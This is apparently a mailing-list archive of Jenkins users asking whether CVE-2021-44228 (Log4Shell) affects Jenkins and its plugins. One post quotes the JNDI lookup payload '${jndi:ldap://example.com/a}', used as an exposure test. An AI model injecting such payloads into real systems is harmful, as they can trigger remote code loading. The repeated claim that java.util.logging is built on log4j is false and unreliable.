Re: [Urgent] CVE-2021-44228 and Jenkins

2021-12-28 Thread Baptiste Mathus
On Sun, Dec 12, 2021 at 16:27, the.n...@gmail.com wrote: > Hi All, > > I am looking for any information relating to whether the Zero Days CVE has > any impact on Jenkins or Plugins. We do know that the java.util.logging is > built on log4j, > Where did you read that java.util.logging is built

Re: [Urgent] CVE-2021-44228 and Jenkins

2021-12-12 Thread the.n...@gmail.com
Good discussion here: https://issues.jenkins.io/browse/JENKINS-67353 On Sunday, December 12, 2021 at 12:28:09 p.m. UTC-5 the.n...@gmail.com wrote: > The good news is that passing the ${jndi:ldap://example.com/a} string > through the logger does not trigger the CVE behaviour. > > On Sunday, Dec

Re: [Urgent] CVE-2021-44228 and Jenkins

2021-12-12 Thread the.n...@gmail.com
The good news is that passing the ${jndi:ldap://example.com/a} string through the logger does not trigger the CVE behaviour. On Sunday, December 12, 2021 at 11:44:35 a.m. UTC-5 the.n...@gmail.com wrote: > Running the script: > println(java.util.logging.Logger.class) > > does indicate that Apa

Re: [Urgent] CVE-2021-44228 and Jenkins

2021-12-12 Thread the.n...@gmail.com
Running the script: println(java.util.logging.Logger.class) does indicate that Apache logger (built on top of Log4j) is present in the LTS version of Jenkins. On Sunday, December 12, 2021 at 11:39:55 a.m. UTC-5 the.n...@gmail.com wrote: > Hi Kritesh, > > Thank you for this info. > > The probl

Re: [Urgent] CVE-2021-44228 and Jenkins

2021-12-12 Thread the.n...@gmail.com
Hi Kritesh, Thank you for this info. The problem with that example is that Apache java.util.logging is built on top of Log4j but does not identify as such. I am not convinced that this test is sufficient. Sincerely, Randall On Sunday, December 12, 2021 at 11:34:15 a.m. UTC-5 krite...@gmail.co

Re: [Urgent] CVE-2021-44228 and Jenkins

2021-12-12 Thread Krish S
I am following for the same issue… found below info on community page regarding this vulnerability. https://www.jenkins.io/blog/2021/12/10/log4j2-rce-CVE-2021-44228/ Thanks & Regards, Kritesh On Sun, Dec 12, 2021 at 9:27 AM the.n...@gmail.com wrote: > Hi All, > > I am looking for any informat

[Urgent] CVE-2021-44228 and Jenkins

2021-12-12 Thread the.n...@gmail.com
Hi All, I am looking for any information relating to whether the Zero Days CVE has any impact on Jenkins or Plugins. We do know that the java.util.logging is built on log4j, but do not know whether protections are in place to prevent this vulnerability from being exploited, and where. For examp